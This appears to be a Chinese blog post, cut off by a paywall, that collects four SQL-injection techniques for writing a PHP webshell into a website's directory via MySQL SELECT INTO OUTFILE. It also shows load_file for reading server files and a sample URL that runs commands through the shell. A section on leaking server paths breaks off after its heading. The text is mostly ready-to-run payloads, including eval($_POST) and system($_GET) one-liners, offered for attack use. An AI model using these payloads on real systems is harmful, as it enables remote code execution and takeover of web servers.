方法一:
CREATE TABLE mysql.xiaoma (xiaoma1 TEXT NOT NULL );
INSERT INTO mysql.xiaoma (xiaoma1 )VALUES (’<?php @eval($_POST[xiaoma])?>’);
SELECT xiaomaFROM study INTO OUTFILE ‘E:/wamp/www/7.php’;
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
一句话连接密码:xiaoma
方法二:
Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES(’<?php eval($_POST[xiaoma])?>’);
select xiaoma1 from xiaoma into outfile ‘E:/wamp/www/7.php’;
Drop TABLE IF EXISTS xiaoma;
方法三:
读取文件内容: select load_file(‘E:/xamp/www/s.php’);
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE ‘E:/xamp/www/xiaoma.php’
cmd执行权限:select ‘<?php echo \'
\';system($_GET[\'cmd\']); echo \'\'; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’
方法四:
select load_file(‘E:/xamp/www/xiaoma.php’);
select ‘<?php echo \'
\';system($_GET[\'cmd\']); echo \'\'; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’
然后访问网站目录: http://www.xxxx.com/xiaoma.php?cmd=dir
php爆路径方法收集 :
1、单引号爆路径
说明:
直接在

本文介绍了多种利用PHP在数据库中创建、读取和导出文件的方法,如通过CREATE TABLE、INSERT INTO、SELECT INTO OUTFILE等SQL语句。此外,还列举了不同场景下的路径爆破技术,包括通过URL参数、错误信息、配置文件、PHPmyadmin等途径获取服务器路径信息。这些方法展示了如何在合法操作和恶意攻击中使用PHP。
最低0.47元/天 解锁文章
1108

被折叠的 条评论
为什么被折叠?



